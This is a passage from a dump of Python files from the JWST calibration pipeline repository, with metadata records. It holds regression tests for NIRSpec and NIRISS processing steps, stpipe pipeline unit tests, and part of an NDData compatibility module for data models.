'test_ramp_fit'\n\n def test_ramp_fit_nirspec(self):\n \"\"\"\n\n Regression test of ramp_fit step performed on NIRSpec data. This is a single\n integration dataset.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00023001001_01101_00001_NRS1_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits', name='RampFit'\n )\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00023001001_01101_00001_NRS1_ramp_fit.fits'),\n ('rampfit_opt_out_fitopt.fits',\n 'jw00023001001_01101_00001_NRS1_opt.fits',\n ['primary','slope','sigslope','yint','sigyint',\n 'pedestal','weights','crmag'])\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecWCS(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_wcs', 'nrs1-fs', 'truth']\n test_dir = ['test_wcs', 'nrs1-fs']\n\n def test_nirspec_nrs1_wcs(self):\n \"\"\"\n\n Regression test of creating a WCS object and doing pixel to sky transformation.\n\n \"\"\"\n input_file = self.get_data(*self.test_dir,\n 'jw00023001001_01101_00001_NRS1_ramp_fit.fits')\n ref_file = self.get_data(*self.ref_loc,\n 'jw00023001001_01101_00001_NRS1_ramp_fit_assign_wcs.fits')\n\n result = AssignWcsStep.call(input_file, save_results=True, suffix='assign_wcs')\n result.close()\n\n im = ImageModel(result.meta.filename)\n imref = ImageModel(ref_file)\n\n for slit in ['S200A1', 'S200A2', 'S400A1', 'S1600A1']:\n w = nirspec.nrs_wcs_set_input(im, slit)\n grid = grid_from_bounding_box(w.bounding_box)\n ra, dec, lam = w(*grid)\n wref = nirspec.nrs_wcs_set_input(imref, slit)\n raref, decref, lamref = wref(*grid)\n\n assert_allclose(ra, raref, equal_nan=True)\n assert_allclose(dec, decref, equal_nan=True)\n assert_allclose(lam, lamref, equal_nan=True)\n\n\[email protected]\nclass TestNRSSpec2(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_nrs_fs_single_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec fixed-slit data\n that uses a single-slit subarray (S200B1).\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 
'jw84600002001_02101_00001_nrs2_rate.fits')\n        step = Spec2Pipeline()\n        step.save_bsub = True\n        step.save_results = True\n        step.resample_spec.save_results = True\n        step.cube_build.save_results = True\n        step.extract_1d.save_results = True\n        step.run(input_file)\n\n        outputs = [('jw84600002001_02101_00001_nrs2_cal.fits',\n                    'jw84600002001_02101_00001_nrs2_cal_ref.fits'),\n                   ('jw84600002001_02101_00001_nrs2_s2d.fits',\n                    'jw84600002001_02101_00001_nrs2_s2d_ref.fits'),\n                   ('jw84600002001_02101_00001_nrs2_x1d.fits',\n                    'jw84600002001_02101_00001_nrs2_x1d_ref.fits')\n                   ]\n        self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRSpecMasterBackground_FS(BaseJWSTTest):\n    input_loc = 'nirspec'\n    ref_loc = ['test_masterbackground', 'nrs-fs', 'truth']\n    test_dir = ['test_masterbackground', 'nrs-fs']\n\n    def test_nirspec_fs_masterbg_user(self):\n        \"\"\"\n        Regression test of master background subtraction for NRS FS when a\n        user 1-D spectrum is provided.\n        \"\"\"\n        # input file has 2-D background image added to it\n\n        input_file = self.get_data(*self.test_dir, 'nrs_sci+bkg_cal.fits')\n        # user-provided 1-D background was created from the 2-D background image\n        input_1dbkg_file = self.get_data(*self.test_dir, 'nrs_bkg_user_clean_x1d.fits')\n\n        result = MasterBackgroundStep.call(input_file,\n                                           user_background=input_1dbkg_file,\n                                           save_results=True)\n\n        # Compare background-subtracted science data (results)\n        # to a truth file. These data are MultiSlitModel data\n        result_file = result.meta.filename\n\n        truth_file = self.get_data(*self.ref_loc,\n                                   'nrs_sci+bkg_masterbackgroundstep.fits')\n\n        outputs = [(result_file, truth_file)]\n        self.compare_outputs(outputs)\n        result.close()\n\n\[email protected]\nclass TestNIRSpecMasterBackground_IFU(BaseJWSTTest):\n    input_loc = 'nirspec'\n    ref_loc = ['test_masterbackground', 'nrs-ifu', 'truth']\n    test_dir = ['test_masterbackground', 'nrs-ifu']\n\n    def test_nirspec_ifu_masterbg_user(self):\n        \"\"\"\n        Regression test of master background subtraction for NRS IFU when a\n        user 1-D spectrum is provided.\n        \"\"\"\n        # input file has 2-D background image added to it\n        input_file = self.get_data(*self.test_dir, 'prism_sci_bkg_cal.fits')\n\n        # user-provided 1-D background was created from the 2-D background image\n        user_background = self.get_data(*self.test_dir, 'prism_bkg_x1d.fits')\n\n        result = MasterBackgroundStep.call(input_file,\n                                           user_background=user_background,\n                                           save_results=True)\n\n        # Test 2: compare the science data with no background to the\n        # background-subtracted science image output from the\n        # master background subtraction step.\n        input_sci_cal_file = self.get_data(*self.test_dir,\n                                           'prism_sci_cal.fits')\n        input_sci_model = datamodels.open(input_sci_cal_file)\n\n        # We don't want the slice gaps to impact the statistic,\n        # so loop over the 30 slices\n        for i in range(30):\n            slice_wcs = nirspec.nrs_wcs_set_input(input_sci_model, i)\n            x, y = grid_from_bounding_box(slice_wcs.bounding_box)\n            ra, dec, lam = slice_wcs(x, y)\n            valid = np.isfinite(lam)\n            result_slice_region = result.data[y.astype(int), x.astype(int)]\n            sci_slice_region = input_sci_model.data[y.astype(int),\n                                                    x.astype(int)]\n            sci_slice = sci_slice_region[valid]\n            result_slice = result_slice_region[valid]\n            sub = result_slice - sci_slice\n\n            # check for outliers in the science image\n            sci_mean = np.nanmean(sci_slice)\n            sci_std = np.nanstd(sci_slice)\n            upper = sci_mean + sci_std*5.0\n            lower = sci_mean - sci_std*5.0\n            mask_clean = np.logical_and(sci_slice < upper, sci_slice > lower)\n\n            sub_mean = 
np.absolute(np.nanmean(sub[mask_clean]))\n            atol = 2.0\n            assert_allclose(sub_mean, 0, atol=atol)\n\n        # Test 3: Compare background-subtracted science data (results)\n        # to a truth file. These data are MultiSlit data\n\n        input_sci_model.close()\n        result_file = result.meta.filename\n        truth_file = self.get_data(*self.ref_loc,\n                                   'prism_sci_bkg_masterbackgroundstep.fits')\n\n        outputs = [(result_file, truth_file)]\n        self.compare_outputs(outputs)\n        result.close()\n\n\[email protected]\nclass TestNIRSpecMasterBackground_MOS(BaseJWSTTest):\n    input_loc = 'nirspec'\n    ref_loc = ['test_masterbackground', 'nrs-mos', 'truth']\n    test_dir = ['test_masterbackground', 'nrs-mos']\n\n    def test_nirspec_mos_masterbg_user(self):\n        \"\"\"\n        Regression test of master background subtraction for NRS MOS when\n        a user 1-D spectrum is provided.\n        \"\"\"\n        # input file has 2-D background image added to it\n        input_file = self.get_data(*self.test_dir, 'nrs_mos_sci+bkg_cal.fits')\n        # user-provided 1-D background was created from the 2-D background image\n        input_1dbkg_file = self.get_data(*self.test_dir, 'nrs_mos_bkg_x1d.fits')\n\n        result = MasterBackgroundStep.call(input_file,\n                                           user_background=input_1dbkg_file,\n                                           save_results=True)\n\n        # Compare background-subtracted science data (results)\n        # to a truth file. These data are MultiSlit data.\n        result_file = result.meta.filename\n        ref_file = self.get_data(*self.ref_loc, 'nrs_mos_sci+bkg_masterbackgroundstep.fits')\n\n        outputs = [(result_file, ref_file)]\n        self.compare_outputs(outputs)\n        result.close()\n\[email protected]\nclass TestNIRSpecMasterBackgroundNodded(BaseJWSTTest):\n    input_loc = 'nirspec'\n    ref_loc = ['test_masterbackground', 'nrs-ifu', 'nodded', 'truth']\n    test_dir = ['test_masterbackground', 'nrs-ifu', 'nodded']\n\n    rtol = 0.000001\n\n    def test_nirspec_masterbg_nodded(self):\n        \"\"\"Run masterbackground step on NIRSpec association\"\"\"\n        asn_file = self.get_data(*self.test_dir,\n                                  'nirspec_spec3_asn.json')\n        for file in raw_from_asn(asn_file):\n            self.get_data(*self.test_dir, file)\n\n        collect_pipeline_cfgs('./config')\n        result = MasterBackgroundStep.call(\n            asn_file,\n            config_file='config/master_background.cfg',\n            save_background=True,\n            save_results=True\n        )\n\n        # test 1\n        # compare background subtracted data to truth files\n        # check that the cal_step master_background ran to completion\n        outputs = []\n        for model in result:\n            assert model.meta.cal_step.master_background == 'COMPLETE'\n\n            result_file = model.meta.filename.replace('cal', 'master_background')\n            truth_file = self.get_data(*self.ref_loc, result_file)\n\n            outputs.append((result_file, truth_file))\n        self.compare_outputs(outputs)\n\n\n        # test 2\n        # compare the master background combined file to truth file\n        master_combined_bkg_file = 'ifu_prism_source_off_fix_NRS1_o001_masterbg.fits'\n        truth_background = self.get_data(*self.ref_loc,\n                                          master_combined_bkg_file)\n        outputs = [(master_combined_bkg_file, truth_background)]\n        self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5996652841567993, "alphanum_fraction": 0.6117515563964844, "avg_line_length": 25.106796264648438, "blob_id": "9f65d4b53bcff480ccf5e4109a17876913eb6b1b", "content_id": "9e34c0ed365732840395beab1e019a54c668a331", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5378, "license_type": "permissive", "max_line_length": 82, "num_lines": 206, "path": "/jwst/stpipe/tests/test_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", 
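[Editor's note: illustrative sketch, not part of the recorded repository data.] The IFU master-background test above validates the subtraction slice by slice: it discards science pixels more than 5 sigma from the slice mean, then requires the mean residual between the background-subtracted result and the clean science frame to be near zero. The same check in isolation (the function name is invented for illustration):

    import numpy as np

    def mean_residual_after_clip(sci_slice, result_slice, nsigma=5.0):
        # Mean |result - science| over pixels within nsigma of the science mean.
        sub = result_slice - sci_slice
        mean, std = np.nanmean(sci_slice), np.nanstd(sci_slice)
        mask_clean = (sci_slice > mean - nsigma * std) & (sci_slice < mean + nsigma * std)
        return np.absolute(np.nanmean(sub[mask_clean]))

    # assert_allclose(mean_residual_after_clip(sci_slice, result_slice), 0, atol=2.0)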
"text": "from os.path import dirname, join, abspath\nimport sys\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport pytest\n\nfrom jwst.stpipe import Step, Pipeline, LinearPipeline\nfrom jwst import datamodels\n# TODO: Test system call steps\n\n\ndef library_function():\n import logging\n log = logging.getLogger()\n log.info(\"This is a library function log\")\n\n\nclass FlatField(Step):\n \"\"\"\n An example flat-fielding Step.\n \"\"\"\n\n # Load the spec from a file\n\n def process(self, science, flat):\n self.log.info(\"Removing flat field\")\n self.log.info(\"Threshold: {0}\".format(self.threshold))\n library_function()\n\n output = datamodels.ImageModel(data=science.data - flat.data)\n return output\n\n\nclass Combine(Step):\n \"\"\"\n A Step that combines a list of images.\n \"\"\"\n\n def process(self, images):\n combined = np.zeros((50, 50))\n for image in images:\n combined += image.data\n return datamodels.ImageModel(data=combined)\n\n\nclass Display(Step):\n \"\"\"\n A Step to display an image.\n \"\"\"\n\n def process(self, image):\n pass\n\n\nclass MultiplyBy2(Step):\n \"\"\"\n A Step that does the incredibly complex thing of multiplying by 2.\n \"\"\"\n\n def process(self, image):\n with datamodels.ImageModel(image) as dm:\n dm2 = datamodels.ImageModel()\n dm2.data = dm.data * 2\n return dm2\n\n\nclass MyPipeline(Pipeline):\n \"\"\"\n A test pipeline.\n \"\"\"\n\n step_defs = {\n 'flat_field': FlatField,\n 'combine': Combine,\n 'display': Display\n }\n\n spec = \"\"\"\n science_filename = input_file() # The input science filename\n flat_filename = input_file(default=None) # The input flat filename\n output_filename = output_file() # The output filename\n \"\"\"\n\n def process(self, *args):\n science = datamodels.open(self.science_filename)\n if self.flat_filename is None:\n self.flat_filename = join(dirname(__file__), \"data/flat.fits\")\n flat = datamodels.open(self.flat_filename)\n calibrated = []\n calibrated.append(self.flat_field(science, flat))\n combined = self.combine(calibrated)\n self.display(combined)\n dm = datamodels.ImageModel(combined)\n dm.save(self.output_filename)\n science.close()\n flat.close()\n return dm\n\n\ndef test_pipeline(_jail):\n pipeline_fn = join(dirname(__file__), 'steps', 'python_pipeline.cfg')\n pipe = Step.from_config_file(pipeline_fn)\n pipe.output_filename = \"output.fits\"\n\n assert pipe.flat_field.threshold == 42.0\n assert pipe.flat_field.multiplier == 2.0\n\n pipe.run()\n\n\ndef test_pipeline_python(_jail):\n steps = {\n 'flat_field': {'threshold': 42.0}\n }\n\n pipe = MyPipeline(\n \"MyPipeline\",\n config_file=__file__,\n steps=steps,\n science_filename=abspath(join(dirname(__file__), 'data', 'science.fits')),\n flat_filename=abspath(join(dirname(__file__), 'data', 'flat.fits')),\n output_filename=\"output.fits\")\n\n assert pipe.flat_field.threshold == 42.0\n assert pipe.flat_field.multiplier == 1.0\n\n pipe.run()\n\n\nclass MyLinearPipeline(LinearPipeline):\n pipeline_steps = [\n ('multiply', MultiplyBy2),\n ('multiply2', MultiplyBy2),\n ('multiply3', MultiplyBy2)\n ]\n\n\ndef test_partial_pipeline(_jail):\n pipe = MyLinearPipeline()\n\n pipe.end_step = 'multiply2'\n result = pipe.run(abspath(join(dirname(__file__), 'data', 'science.fits')))\n\n pipe.start_step = 'multiply3'\n pipe.end_step = None\n result = pipe.run(abspath(join(dirname(__file__), 'data', 'science.fits')))\n\n assert_allclose(np.sum(result.data), 9969.82514685, rtol=1e-4)\n\n\ndef test_pipeline_commandline(_jail):\n args = [\n 
abspath(join(dirname(__file__), 'steps', 'python_pipeline.cfg')),\n '--steps.flat_field.threshold=47'\n ]\n\n pipe = Step.from_cmdline(args)\n\n assert pipe.flat_field.threshold == 47.0\n assert pipe.flat_field.multiplier == 2.0\n\n pipe.run()\n\n\ndef test_pipeline_commandline_class(_jail):\n args = [\n 'jwst.stpipe.tests.test_pipeline.MyPipeline',\n '--logcfg={0}'.format(\n abspath(join(dirname(__file__), 'steps', 'log.cfg'))),\n # The file_name parameters are *required*\n '--science_filename={0}'.format(\n abspath(join(dirname(__file__), 'data', 'science.fits'))),\n '--output_filename={0}'.format(\n 'output.fits'),\n '--steps.flat_field.threshold=47'\n ]\n\n pipe = Step.from_cmdline(args)\n\n assert pipe.flat_field.threshold == 47.0\n assert pipe.flat_field.multiplier == 1.0\n\n pipe.run()\n\n\ndef test_pipeline_commandline_invalid_args():\n from io import StringIO\n\n args = [\n 'jwst.stpipe.tests.test_pipeline.MyPipeline',\n # The file_name parameters are *required*, and one of them\n # is missing, so we should get a message to that effect\n # followed by the commandline usage message.\n '--flat_filename={0}'.format(\n abspath(join(dirname(__file__), 'data', 'flat.fits'))),\n '--steps.flat_field.threshold=47'\n ]\n\n sys.stdout = buffer = StringIO()\n\n with pytest.raises(ValueError):\n Step.from_cmdline(args)\n\n help = buffer.getvalue()\n assert \"Multiply by this number\" in help\n" }, { "alpha_fraction": 0.6379310488700867, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 18.33333396911621, "blob_id": "3d09f4e6c277301ee16cd013f2f9c2415685221b", "content_id": "02786c336309937fbcd83299d0d359a32d898d80", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "permissive", "max_line_length": 32, "num_lines": 3, "path": "/jwst/rscd/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .rscd_step import RSCD_Step\n\n__all__ = ['RSCD_Step']\n" }, { "alpha_fraction": 0.5076512694358826, "alphanum_fraction": 0.5766903758049011, "avg_line_length": 33.90683364868164, "blob_id": "2196bd9dac7eb1588bbab6ac3d17bebfcb21d3c7", "content_id": "3419b218d7cd8a6ead12946205f9303881c9a008", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5620, "license_type": "permissive", "max_line_length": 88, "num_lines": 161, "path": "/jwst/tests_nightly/general/niriss/test_niriss_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\nfrom jwst.pipeline import (\n Ami3Pipeline,\n Detector1Pipeline,\n)\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.photom import PhotomStep\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestAMIPipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_ami_pipeline', 'truth']\n test_dir = 'test_ami_pipeline'\n\n def test_ami_pipeline(self):\n \"\"\"\n Regression test of the AMI pipeline performed on NIRISS AMI data.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'test_lg1_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n pipe = Ami3Pipeline()\n pipe.save_averages = True\n pipe.ami_analyze.oversample = 3\n pipe.ami_analyze.rotation = 1.49\n pipe.run(asn_file)\n\n outputs = [('test_targ_aminorm.fits',\n 'ami_pipeline_targ_lgnorm.fits'),\n ]\n 
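[Editor's note: illustrative sketch, not part of the recorded repository data.] The stpipe tests above exercise the central pattern of the framework: a Step declares typed, documented parameters in its spec string, and those parameters surface as instance attributes and as --steps.<step_name>.<param> command-line overrides. A minimal hypothetical step written against that pattern (ScaleStep and its factor parameter are invented):

    from jwst import datamodels
    from jwst.stpipe import Step

    class ScaleStep(Step):
        spec = """
        factor = float(default=1.0)  # Multiply the data by this number
        """

        def process(self, input_data):
            with datamodels.open(input_data) as model:
                result = model.copy()
                result.data = result.data * self.factor
            return result

    # result = ScaleStep.call('science.fits', factor=2.0)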
self.compare_outputs(outputs, rtol=0.00001,\n ignore_hdus=['ASDF', 'HDRTAB'])\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_detector1pipeline', 'truth']\n test_dir = 'test_detector1pipeline'\n\n def test_niriss_detector1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on NIRISS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.persistence.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n step.refpix.side_smoothing_length = 11\n step.refpix.side_gain = 1.0\n step.refpix.odd_even_rows = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.ramp_fit.suffix = 'ramp'\n step.output_file = 'jw00034001001_01101_00001_NIRISS_rate.fits'\n\n step.run(input_file)\n\n outputs = [('jw00034001001_01101_00001_NIRISS_ramp.fits',\n 'jw00034001001_01101_00001_NIRISS_ramp_ref.fits'),\n ('jw00034001001_01101_00001_NIRISS_rate.fits',\n 'jw00034001001_01101_00001_NIRISS_rate_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSSOSS2Pipeline(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_spec2pipeline', 'truth']\n test_dir = 'test_spec2pipeline'\n\n def test_nirisssoss2pipeline1(self):\n \"\"\"\n Regression test of calwebb_tso_spec2 pipeline performed on NIRISS SOSS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw10003001002_03101_00001-seg003_nis_rateints.fits')\n collect_pipeline_cfgs()\n args = [\n 'calwebb_tso-spec2.cfg',\n input_file\n ]\n Step.from_cmdline(args)\n\n outputs = [{'files':('jw10003001002_03101_00001-seg003_nis_calints.fits',\n 'jw10003001002_03101_00001-seg003_nis_calints_ref.fits'),\n 'pars':dict(ignore_hdus=['INT_TIMES', 'VAR_POISSON',\n 'VAR_RNOISE', 'ASDF'])},\n {'files':('jw10003001002_03101_00001-seg003_nis_x1dints.fits',\n 'jw10003001002_03101_00001-seg003_nis_x1dints_ref.fits'),\n 'pars':dict(ignore_hdus=['INT_TIMES', 'ASDF'])}\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSPhotom(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_photom', 'truth']\n test_dir = 'test_photom'\n\n def test_photom_niriss(self):\n \"\"\"\n Regression test of photom step performed on NIRISS imaging data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_flat_field.fits')\n\n result = PhotomStep.call(input_file)\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00034001001_01101_00001_NIRISS_photom.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRISSRampFit(BaseJWSTTest):\n input_loc = 'niriss'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_niriss(self):\n \"\"\"\n Regression test of ramp_fit step performed on NIRISS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00034001001_01101_00001_NIRISS_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits'\n )\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00034001001_01101_00001_NIRISS_ramp_fit.fits'),\n ('rampfit_opt_out_fitopt.fits',\n 'jw00034001001_01101_00001_NIRISS_uncal_opt.fits',\n ['primary','slope','sigslope','yint','sigyint',\n 
'pedestal','weights','crmag'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5054572820663452, "alphanum_fraction": 0.5875046849250793, "avg_line_length": 31.40243911743164, "blob_id": "32abdfd6527cb5643c7a337b2fb16fecda1fbfb4", "content_id": "0c56b6dc0d427e772ea15bfd2102554b0977fd44", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "permissive", "max_line_length": 86, "num_lines": 82, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_fs_spec3.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec3 against NIRSpec Fixed-slit science (FSS)\"\"\"\nfrom glob import glob\nfrom os import path\nimport pytest\n\nfrom jwst.associations import load_asn\nfrom jwst.pipeline import Spec3Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec3Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n\n def test_save_source_only(self):\n \"\"\"Test saving the source-based files only\"\"\"\n datapath = ['test_datasets', 'fss', '93045', 'level2b']\n\n asn_file = self.get_data(*datapath,\n 'jw93045-o010_20180725t035735_spec3_001_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*datapath, file)\n\n pipe = Spec3Pipeline()\n pipe.mrs_imatch.skip = True\n pipe.outlier_detection.skip = True\n pipe.resample_spec.skip = True\n pipe.cube_build.skip = True\n pipe.extract_1d.skip = True\n\n pipe.run(asn_file)\n\n # Check resulting product\n with open(asn_file) as fh:\n asn = load_asn(fh)\n base_name = asn['products'][0]['name']\n product_name = base_name.format(source_id='s00000') + '_cal.fits'\n output_files = glob('*')\n\n if product_name in output_files:\n output_files.remove(product_name)\n else:\n assert False\n\n\n @pytest.mark.xfail(\n reason='See Issue JP-1144',\n run=False\n )\n def test_nrs_fs_spec3(self):\n \"\"\"\n Regression test of calwebb_spec3 pipeline performed on\n NIRSpec fixed-slit data.\n \"\"\"\n cfg_dir = './cfgs'\n collect_pipeline_cfgs(cfg_dir)\n datapath = ['test_datasets', 'fss', '93045', 'level2b']\n asn_file = self.get_data(*datapath,\n 'jw93045-o010_20180725t035735_spec3_001_asn.json')\n\n for file in raw_from_asn(asn_file):\n self.get_data(*datapath, file)\n\n args = [\n path.join(cfg_dir, 'calwebb_spec3.cfg'),\n asn_file\n ]\n\n Step.from_cmdline(args)\n\n # Compare results\n outputs = [('jw00023001001_01101_00001_NRS1_cal.fits',\n 'jw00023001001_01101_00001_NRS1_cal_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_s2d.fits',\n 'jw00023001001_01101_00001_NRS1_s2d_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_x1d.fits',\n 'jw00023001001_01101_00001_NRS1_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5496792793273926, "alphanum_fraction": 0.5505956411361694, "avg_line_length": 25.89788818359375, "blob_id": "6c3189937d90d50530ba11886da18b9303ff26c1", "content_id": "4d8b46ee9bb97ee98df3583f21385dd37f8a960b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7639, "license_type": "permissive", "max_line_length": 79, "num_lines": 284, "path": "/jwst/datamodels/ndmodel.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nSubclass of NDDataBase to support DataModel compatibility with NDData\n\"\"\"\n\nimport os.path\nimport numpy as np\nimport 
collections\n\nfrom astropy.units import Quantity\nfrom astropy.nddata import nddata_base\n\nfrom . import util\nfrom . import filetype\nfrom . import properties\n\n#---------------------------------------\n# astropy.io.registry compatibility\n#---------------------------------------\n\ndef identify(origin, path, fileobj, *args, **kwargs):\n    \"\"\"\n    Identify if file is a DataModel for astropy.io.registry\n    \"\"\"\n    if fileobj:\n        file_type = filetype.check(fileobj)\n    elif path:\n        if os.path.isfile(path):\n            file_type = filetype.check(path)\n        else:\n            file_type = path.lower().split(\".\")[1]\n    else:\n        file_type = None\n\n    flag = file_type and (file_type == \"asdf\" or file_type == \"fits\")\n    return flag\n\ndef read(data, *args, **kwargs):\n    \"\"\"\n    Astropy.io registry compatibility function to wrap util.open\n    \"\"\"\n\n    # Translate keyword arguments to those expected by ImageModel\n    xargs = {}\n    if kwargs.get(\"mask\"):\n        xargs[\"dq\"] = kwargs[\"mask\"]\n\n    uncertainty = kwargs.get(\"uncertainty\")\n    if uncertainty:\n        if isinstance(uncertainty, Quantity):\n            uncertainty_type = uncertainty.unit\n            uncertainty = uncertainty.data\n        else:\n            uncertainty_type = None\n        xargs[\"err\"] = uncertainty\n    else:\n        uncertainty_type = None\n\n    if hasattr(data, 'mask') and hasattr(data, 'data'):\n        xargs[\"dq\"] = data.mask\n        data = data.data\n\n    if isinstance(data, Quantity):\n        unit = data.unit\n        data = data.value\n    else:\n        unit = kwargs.get(\"unit\")\n\n    # Create the model using the transformed arguments\n    model = util.open(data, **xargs)\n\n    # Add attributes passed as keyword arguments to model\n    if unit:\n        model.meta.bunit_data = unit\n\n    wcs = kwargs.get(\"wcs\")\n    if wcs:\n        model.set_fits_wcs(wcs)\n\n    if uncertainty_type:\n        model.meta.bunit_err = uncertainty_type\n\n    return model\n\ndef write(data, path, *args, **kwargs):\n    \"\"\"\n    Astropy.io registry compatibility function to wrap datamodel.save\n    \"\"\"\n    from .model_base import DataModel\n\n    if not isinstance(data, DataModel):\n        model = DataModel(data)\n    else:\n        model = data\n\n    if isinstance(path, str):\n        model.save(path, *args, **kwargs)\n    else:\n        raise ValueError(\"Path to write DataModel was not found\")\n\n#---------------------------------------\n# Astropy NDData compatibility\n#---------------------------------------\n\nclass NDModel(nddata_base.NDDataBase):\n    def my_attribute(self, attr):\n        \"\"\"\n        Test if attribute is part of the NDData interface\n        \"\"\"\n        properties = frozenset((\"data\", \"mask\", \"unit\", \"wcs\", \"uncertainty\"))\n        return attr in properties\n\n    @property\n    def data(self):\n        \"\"\"\n        Read the stored dataset.\n        \"\"\"\n        primary_array_name = self.get_primary_array_name()\n        if primary_array_name:\n            primary_array = self.__getattr__(primary_array_name)\n        else:\n            raise AttributeError(\"No attribute 'data'\")\n        return primary_array\n\n    @data.setter\n    def data(self, value):\n        \"\"\"\n        Write the stored dataset.\n        \"\"\"\n        primary_array_name = self.get_primary_array_name()\n        if not primary_array_name:\n            primary_array_name = 'data'\n        properties.ObjectNode.__setattr__(self, primary_array_name, value)\n\n    @property\n    def mask(self):\n        \"\"\"\n        Read the mask for the dataset.\n        \"\"\"\n        return self.__getattr__('dq')\n\n    @mask.setter\n    def mask(self, value):\n        \"\"\"\n        Write the mask for the dataset.\n        \"\"\"\n        properties.ObjectNode.__setattr__(self, 'dq', value)\n\n    @property\n    def unit(self):\n        \"\"\"\n        Read the units for the dataset.\n        \"\"\"\n        try:\n            val = self.meta.bunit_data\n        except AttributeError:\n            val = None\n        return 
val\n\n @unit.setter\n def unit(self, value):\n \"\"\"\n Write the units for the dataset.\n \"\"\"\n self.meta.bunit_data = value\n\n @property\n def wcs(self):\n \"\"\"\n Read the world coordinate system (WCS) for the dataset.\n \"\"\"\n return self.get_fits_wcs()\n\n @wcs.setter\n def wcs(self, value):\n \"\"\"\n Write the world coordinate system (WCS) to the dataset.\n \"\"\"\n return self.set_fits_wcs(value)\n\n @property\n def meta(self):\n \"\"\"\n Read additional meta information about the dataset.\n \"\"\"\n return self.__getattr__('meta')\n\n\n @property\n def uncertainty(self):\n \"\"\"\n Read the uncertainty in the dataset.\n \"\"\"\n err = self.err\n try:\n val = self.meta.bunit_err\n except AttributeError:\n val = None\n return Uncertainty(err, uncertainty_type=val)\n\n @uncertainty.setter\n def uncertainty(self, value):\n \"\"\"\n Write the uncertainty in the dataset.\n \"\"\"\n properties.ObjectNode.__setattr__(self, 'err', value)\n if hasattr(value, 'uncertainty_type'):\n self.meta.bunit_err = value.uncertainty_type\n\n#---------------------------------------------\n# The following classes provide support\n# for the NDData interface to Datamodels\n#---------------------------------------------\n\nclass MetaNode(properties.ObjectNode, collections.abc.MutableMapping):\n \"\"\"\n NDData compatibility class for meta node\n \"\"\"\n def __init__(self, name, instance, schema, ctx):\n properties.ObjectNode.__init__(self, name, instance, schema, ctx)\n\n 